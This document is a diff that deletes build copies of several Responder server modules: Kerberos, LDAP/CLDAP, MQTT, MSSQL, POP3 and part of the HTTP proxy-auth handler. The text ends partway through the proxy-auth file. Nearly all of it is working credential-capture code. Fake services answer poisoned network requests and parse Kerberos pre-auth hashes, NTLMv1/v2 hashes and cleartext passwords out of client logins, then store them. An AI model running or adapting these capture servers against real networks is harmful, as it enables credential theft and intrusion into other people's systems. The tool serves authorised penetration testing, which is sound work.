from SocketServer import BaseRequestHandler
def ParseMSKerbv5TCP(Data):
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
if MsgType == b'\x0a' and EncType == b'\x17' and MessageType ==b'\x02':
if Data[49:53] == b'\xa2\x36\x04\x34' or Data[49:53] == b'\xa2\x35\x04\x33':
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
if Data[44:48] == b'\xa2\x36\x04\x34' or Data[44:48] == b'\xa2\x35\x04\x33':
HashLen = struct.unpack('<b',Data[45:46])[0]
if HashLen == 53:
Hash = Data[48:99]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[147:148])[0]
Name = Data[148:148+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
elif HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
return False
def ParseMSKerbv5UDP(Data):
MsgType = Data[17:18]
EncType = Data[39:40]
if MsgType == b'\x0a' and EncType == b'\x17':
if Data[40:44] == b'\xa2\x36\x04\x34' or Data[40:44] == b'\xa2\x35\x04\x33':
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
elif HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
else:
Hash = Data[49:101]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[149:150])[0]
Name = Data[150:150+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
return False
class KerbTCP(BaseRequestHandler):
def handle(self):
try:
data = self.request.recv(1024)
KerbHash = ParseMSKerbv5TCP(data)
if KerbHash:
n, krb, v, name, domain, d, h = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except:
pass
class KerbUDP(BaseRequestHandler):
def handle(self):
try:
data, soc = self.request
KerbHash = ParseMSKerbv5UDP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except:
pass

278
build/lib/Responder/servers/LDAP.py
View file

@ -1,278 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
if (sys.version_info > (3, 0)):
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge, CLDAPNetlogon
from Responder.utils import *
import struct
import codecs
import random
def CalculateDNSName(name):
if isinstance(name, bytes):
name = name.decode('latin-1')
name = name.split(".")
DomainPrefix = struct.pack('B', len(name[0])).decode('latin-1')+name[0]
Dnslen = ''
for x in name:
if len(x) >=1:
Dnslen += struct.pack('B', len(x)).decode('latin-1')+x
return Dnslen, DomainPrefix
def ParseCLDAPNetlogon(data):
try:
Dns = data.find(b'DnsDomain')
if Dns == -1:
return False
DnsName = data[Dns+9:]
DnsGuidOff = data.find(b'DomainGuid')
if DnsGuidOff == -1:
return False
Guid = data[DnsGuidOff+10:]
if Dns:
DomainLen = struct.unpack(">B", DnsName[1:2])[0]
DomainName = DnsName[2:2+DomainLen]
if Guid:
DomainGuidLen = struct.unpack(">B", Guid[1:2])[0]
DomainGuid = Guid[2:2+DomainGuidLen]
return DomainName, DomainGuid
except:
pass
def ParseSearch(data):
TID = data[8:9].decode('latin-1')
if re.search(b'Netlogon', data):
NbtName = settings.Config.MachineName
TID = NetworkRecvBufferPython2or3(data[8:10])
if TID[1] == "\x63":
TID = "\x00"+TID[0]
DomainName, DomainGuid = ParseCLDAPNetlogon(data)
DomainGuid = NetworkRecvBufferPython2or3(DomainGuid)
t = CLDAPNetlogon(MessageIDASNStr=TID ,CLDAPMessageIDStr=TID, NTLogonDomainGUID=DomainGuid, NTLogonForestName=CalculateDNSName(DomainName)[0],NTLogonPDCNBTName=CalculateDNSName(NbtName)[0], NTLogonDomainNBTName=CalculateDNSName(NbtName)[0],NTLogonDomainNameShort=CalculateDNSName(DomainName)[1])
t.calculate()
return str(t)
if re.search(b'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))
elif re.search(b'(?i)(objectClass0*.*supportedCapabilities)', data):
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))
elif re.search(b'(objectClass)', data):
return str(LDAPSearchDefaultPacket(MessageIDASNStr=TID))
def ParseLDAPHash(data,client, Challenge): #Parse LDAP NTLMSSP v1/v2
SSPIStart = data.find(b'NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
LMHash = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
SaveToDb({
'module': 'LDAP',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'LDAP',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if LMhashLen < 2 and settings.Config.Verbose:
print(text("[LDAP] Ignoring anonymous NTLM authentication"))
def ParseNTLM(data,client, Challenge):
if re.search(b'(NTLMSSP\x00\x01\x00\x00\x00)', data):
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9].decode('latin-1'),NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
NTLMChall.calculate()
return NTLMChall
elif re.search(b'(NTLMSSP\x00\x03\x00\x00\x00)', data):
ParseLDAPHash(data, client, Challenge)
def ParseCLDAPPacket(data, client, Challenge):
if data[1:2] == b'\x84':
Operation = data[10:11]
PacketLen = struct.unpack('>i',data[2:6])[0]
if Operation == b'\x84':
Operation = data[9:10]
sasl = data[20:21]
OperationHeadLen = struct.unpack('>i',data[11:15])[0]
LDAPVersion = struct.unpack('<b',data[17:18])[0]
if Operation == b'\x60':
UserDomainLen = struct.unpack('<b',data[19:20])[0]
UserDomain = data[20:20+UserDomainLen].decode('latin-1')
AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
if AuthHeaderType == b'\x80':
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen].decode('latin-1')
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserDomain,
'cleartext': Password,
'fullhash': UserDomain+':'+Password,
})
if sasl == b'\xA3':
Buffer = ParseNTLM(data,client, Challenge)
return Buffer
elif Operation == b'\x63':
Buffer = ParseSearch(data)
print(text('[CLDAP] Sent CLDAP pong to %s.'% client.replace("::ffff:","")))
return Buffer
elif settings.Config.Verbose:
print(text('[CLDAP] Operation not supported'))
if data[5:6] == b'\x60':
UserLen = struct.unpack("<b",data[11:12])[0]
UserString = data[12:12+UserLen].decode('latin-1')
PassLen = struct.unpack("<b",data[12+UserLen+1:12+UserLen+2])[0]
PassStr = data[12+UserLen+2:12+UserLen+3+PassLen].decode('latin-1')
if settings.Config.Verbose:
print(text('[CLDAP] Attempting to parse an old simple Bind request.'))
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserString,
'cleartext': PassStr,
'fullhash': UserString+':'+PassStr,
})
def ParseLDAPPacket(data, client, Challenge):
if data[1:2] == b'\x84':
PacketLen = struct.unpack('>i',data[2:6])[0]
MessageSequence = struct.unpack('<b',data[8:9])[0]
Operation = data[9:10]
sasl = data[20:21]
OperationHeadLen = struct.unpack('>i',data[11:15])[0]
LDAPVersion = struct.unpack('<b',data[17:18])[0]
if Operation == b'\x60':#Bind
UserDomainLen = struct.unpack('<b',data[19:20])[0]
UserDomain = data[20:20+UserDomainLen].decode('latin-1')
AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
if AuthHeaderType == b'\x80':
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen].decode('latin-1')
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserDomain,
'cleartext': Password,
'fullhash': UserDomain+':'+Password,
})
if sasl == b'\xA3':
Buffer = ParseNTLM(data,client, Challenge)
return Buffer
elif Operation == b'\x63':
Buffer = ParseSearch(data)
return Buffer
elif settings.Config.Verbose:
print(text('[LDAP] Operation not supported'))
if data[5:6] == b'\x60':
UserLen = struct.unpack("<b",data[11:12])[0]
UserString = data[12:12+UserLen].decode('latin-1')
PassLen = struct.unpack("<b",data[12+UserLen+1:12+UserLen+2])[0]
PassStr = data[12+UserLen+2:12+UserLen+3+PassLen].decode('latin-1')
if settings.Config.Verbose:
print(text('[LDAP] Attempting to parse an old simple Bind request.'))
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserString,
'cleartext': PassStr,
'fullhash': UserString+':'+PassStr,
})
class LDAP(BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(1)
data = self.request.recv(8092)
Challenge = RandomChallenge()
for x in range(5):
Buffer = ParseLDAPPacket(data,self.client_address[0], Challenge)
if Buffer:
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(8092)
except:
pass
class CLDAP(BaseRequestHandler):
def handle(self):
try:
data, soc = self.request
Challenge = RandomChallenge()
for x in range(1):
Buffer = ParseCLDAPPacket(data,self.client_address[0], Challenge)
if Buffer:
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
data, soc = self.request
except:
pass

205
build/lib/Responder/servers/MQTT.py
View file

@ -1,205 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import settings, NetworkSendBufferPython2or3, SaveToDb
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import MQTTv3v4ResponsePacket, MQTTv5ResponsePacket
#Read N byte integer
def readInt(data, offset, numberOfBytes):
value = int.from_bytes(data[offset:offset+numberOfBytes], 'big')
offset += numberOfBytes
return (value, offset)
#Read binary data
def readBinaryData(data, offset):
#Read number of bytes
length, offset = readInt(data, offset, 2)
#Read bytes
value = data[offset:offset+length]
offset += length
return (value, offset)
#Same as readBinaryData() but without reading data
def skipBinaryDataString(data, offset):
length, offset = readInt(data, offset, 2)
offset += length
return offset
#Read UTF-8 encoded string
def readString(data, offset):
value, offset = readBinaryData(data, offset)
return (value.decode('utf-8'), offset)
#Read variable byte integer
#(https://docs.oasis-open.org/mqtt/mqtt/v5.0/os/mqtt-v5.0-os.html#_Toc3901011)
def readVariableByteInteger(data, offset):
multiplier = 1
value = 0
while True:
encodedByte = data[offset]
offset += 1
value = (encodedByte & 127) * multiplier
if (multiplier > 128 * 128 * 128):
return None
multiplier *= 128
if(encodedByte & 128 == 0):
break
return (value, offset)
class MqttPacket:
USERNAME_FLAG = 0x80
PASSWORD_FLAG = 0x40
WILL_FLAG = 0x04
def __init__(self, data):
self.__isValid = True
controllPacketType, offset = readInt(data, 0, 1)
#check if CONNECT packet type
if controllPacketType != 0x10:
self.__isValid = False
return
#Remaining length
remainingLength, offset = readVariableByteInteger(data, offset)
#Protocol name
protocolName, offset = readString(data, offset)
#Check protocol name
if protocolName != "MQTT" and protocolName != "MQIsdp":
self.__isValid = False
return
#Check protocol version
self.__protocolVersion, offset = readInt(data, offset, 1)
#Read connect flag register
connectFlags, offset = readInt(data, offset, 1)
#Read keep alive (skip)
offset += 2
#MQTTv5 implements properties
if self.__protocolVersion > 4:
#Skip all properties
propertiesLength, offset = readVariableByteInteger(data, offset)
offset+=propertiesLength
#Get Client ID
self.clientId, offset = readString(data, offset)
if (self.clientId == ""):
self.clientId = "<Empty>"
#Skip Will
if (connectFlags & self.WILL_FLAG) > 0:
#MQTT v5 implements properties
if self.__protocolVersion > 4:
willProperties, offset = readVariableByteInteger(data, offset)
#Skip will properties
offset = skipBinaryDataString(data, offset)
offset = skipBinaryDataString(data, offset)
#Get Username
if (connectFlags & self.USERNAME_FLAG) > 0:
self.username, offset = readString(data, offset)
else:
self.username = "<Empty>"
#Get Password
if (connectFlags & self.PASSWORD_FLAG) > 0:
self.password, offset = readString(data, offset)
else:
self.password = "<Empty>"
def isValid(self):
return self.__isValid
def getProtocolVersion(self):
return self.__protocolVersion
def data(self, client):
return {
'module': 'MQTT',
'type': 'Cleartext',
'client': client,
'hostname': self.clientId,
'user': self.username,
'cleartext': self.password,
'fullhash': self.username + ':' + self.password
}
class MQTT(BaseRequestHandler):
def handle(self):
CONTROL_PACKET_TYPE_CONNECT = 0x10
try:
data = self.request.recv(2048)
#Read control packet type
controlPacketType, offset = readInt(data, 0, 1)
#Skip non CONNECT packets
if controlPacketType != CONTROL_PACKET_TYPE_CONNECT:
return
#Parse connect packet
packet = MqttPacket(data)
#Skip if it contains invalid data
if not packet.isValid():
#Return response
return
#Send response packet
if packet.getProtocolVersion() < 5:
responsePacket = MQTTv3v4ResponsePacket()
else:
responsePacket = MQTTv5ResponsePacket()
self.request.send(NetworkSendBufferPython2or3(responsePacket))
#Save to DB
SaveToDb(packet.data(self.client_address[0]))
except Exception:
self.request.close()
pass

186
build/lib/Responder/servers/MSSQL.py
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@ -1,186 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import random
import struct
import codecs
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
class TDS_Login_Packet:
def __init__(self, data):
ClientNameOff = struct.unpack('<h', data[44:46])[0]
ClientNameLen = struct.unpack('<h', data[46:48])[0]
UserNameOff = struct.unpack('<h', data[48:50])[0]
UserNameLen = struct.unpack('<h', data[50:52])[0]
PasswordOff = struct.unpack('<h', data[52:54])[0]
PasswordLen = struct.unpack('<h', data[54:56])[0]
AppNameOff = struct.unpack('<h', data[56:58])[0]
AppNameLen = struct.unpack('<h', data[58:60])[0]
ServerNameOff = struct.unpack('<h', data[60:62])[0]
ServerNameLen = struct.unpack('<h', data[62:64])[0]
Unknown1Off = struct.unpack('<h', data[64:66])[0]
Unknown1Len = struct.unpack('<h', data[66:68])[0]
LibraryNameOff = struct.unpack('<h', data[68:70])[0]
LibraryNameLen = struct.unpack('<h', data[70:72])[0]
LocaleOff = struct.unpack('<h', data[72:74])[0]
LocaleLen = struct.unpack('<h', data[74:76])[0]
DatabaseNameOff = struct.unpack('<h', data[76:78])[0]
DatabaseNameLen = struct.unpack('<h', data[78:80])[0]
data = NetworkRecvBufferPython2or3(data)
self.ClientName = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
self.UserName = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
self.Password = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
self.AppName = data[8+AppNameOff:8+AppNameOff+AppNameLen*2].replace('\x00', '')
self.ServerName = data[8+ServerNameOff:8+ServerNameOff+ServerNameLen*2].replace('\x00', '')
self.Unknown1 = data[8+Unknown1Off:8+Unknown1Off+Unknown1Len*2].replace('\x00', '')
self.LibraryName = data[8+LibraryNameOff:8+LibraryNameOff+LibraryNameLen*2].replace('\x00', '')
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
def ParseSQLHash(data, client, Challenge):
SSPIStart = data[8:]
LMhashLen = struct.unpack('<H',data[20:22])[0]
LMhashOffset = struct.unpack('<H',data[24:26])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen]
LMHash = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H',data[30:32])[0]
NthashOffset = struct.unpack('<H',data[32:34])[0]
NTHash = SSPIStart[NthashOffset:NthashOffset+NthashLen]
NTHash = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',data[36:38])[0]
DomainOffset = struct.unpack('<H',data[40:42])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',data[44:46])[0]
UserOffset = struct.unpack('<H',data[48:50])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
if NthashLen == 24:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, codecs.encode(Challenge,'hex').decode('latin-1'))
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': LMHash+":"+NTHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), NTHash[:32], NTHash[32:])
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+User,
'hash': NTHash[:32]+":"+NTHash[32:],
'fullhash': WriteHash,
})
def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5',''))
Pw = b''
for x in Pwd:
Pw += codecs.decode(hex(x ^ 0xa5)[::-1][:2].replace("x", "0"), 'hex')
return Pw.decode('latin-1')
def ParseClearTextSQLPass(data, client):
TDS = TDS_Login_Packet(data)
SaveToDb({
'module': 'MSSQL',
'type': 'Cleartext',
'client': client,
'hostname': "%s (%s)" % (TDS.ServerName, TDS.DatabaseName),
'user': TDS.UserName,
'cleartext': ParseSqlClearTxtPwd(TDS.Password),
'fullhash': TDS.UserName +':'+ ParseSqlClearTxtPwd(TDS.Password),
})
# MSSQL Server class
class MSSQL(BaseRequestHandler):
def handle(self):
try:
self.ntry = 0
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
Challenge = RandomChallenge()
if not data:
break
if settings.Config.Verbose:
print(text("[MSSQL] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
if data[0] == b"\x12" or data[0] == 18: # Pre-Login Message
Buffer = str(MSSQLPreLoginAnswer())
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[0] == b"\x10" or data[0] == 16: # NegoSSP
if re.search(b'NTLMSSP',data):
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
Packet.calculate()
Buffer = str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
else:
ParseClearTextSQLPass(data,self.client_address[0])
if data[0] == b'\x11' or data[0] == 17: # NegoSSP Auth
ParseSQLHash(data,self.client_address[0],Challenge)
except:
pass
# MSSQL Server Browser class
# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
class MSSQLBrowser(BaseRequestHandler):
def handle(self):
if settings.Config.Verbose:
print(text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0]))
data, soc = self.request
if data:
if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX
self.send_response(soc, "MSSQLSERVER")
elif data[0:1] == b'\x04': # CLNT_UCAST_INST
self.send_response(soc, data[1:].rstrip(b"\x00"))
elif data[0:1] == b'\x0F': # CLNT_UCAST_DAC
self.send_dac_response(soc)
def send_response(self, soc, inst):
print(text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0]))
server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
soc.sendto(struct.pack("<BH", 0x05, len(resp)) + NetworkSendBufferPython2or3(resp), self.client_address)
def send_dac_response(self, soc):
print(text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0]))
soc.sendto(NetworkSendBufferPython2or3(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433)), self.client_address)

56
build/lib/Responder/servers/POP3.py
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@ -1,56 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import POPOKPacket,POPNotOKPacket
# POP3 Server class
class POP3(BaseRequestHandler):
def SendPacketAndRead(self):
Packet = POPOKPacket()
self.request.send(NetworkSendBufferPython2or3(Packet))
return self.request.recv(1024)
def handle(self):
try:
data = self.SendPacketAndRead()
if data[0:4] == b'CAPA':
self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket()))
data = self.request.recv(1024)
if data[0:4] == b'AUTH':
self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket()))
data = self.request.recv(1024)
if data[0:4] == b'USER':
User = data[5:].strip(b"\r\n").decode("latin-1")
data = self.SendPacketAndRead()
if data[0:4] == b'PASS':
Pass = data[5:].strip(b"\r\n").decode("latin-1")
SaveToDb({
'module': 'POP3',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
self.SendPacketAndRead()
except Exception:
pass

144
build/lib/Responder/servers/Proxy_Auth.py
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@ -1,144 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler, StreamRequestHandler
else:
from SocketServer import BaseRequestHandler, StreamRequestHandler
from Responder.servers.HTTP import ParseHTTPHash
from Responder.packets import *
def GrabUserAgent(data):
UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
if UserAgent:
print(text("[Proxy-Auth] %s" % color("User-Agent : "+UserAgent[0], 2)))
def GrabCookie(data):
Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
if Cookie:
Cookie = Cookie.group(0).replace('Cookie: ', '')
if len(Cookie) > 1:
if settings.Config.Verbose:
print(text("[Proxy-Auth] %s" % color("Cookie : "+Cookie, 2)))
return Cookie
return False
def GrabHost(data):
Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
if Host:
Host = Host.group(0).replace('Host: ', '')
if settings.Config.Verbose:
print(text("[Proxy-Auth] %s" % color("Host : "+Host, 2)))
return Host
return False
def PacketSequence(data, client, Challenge):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
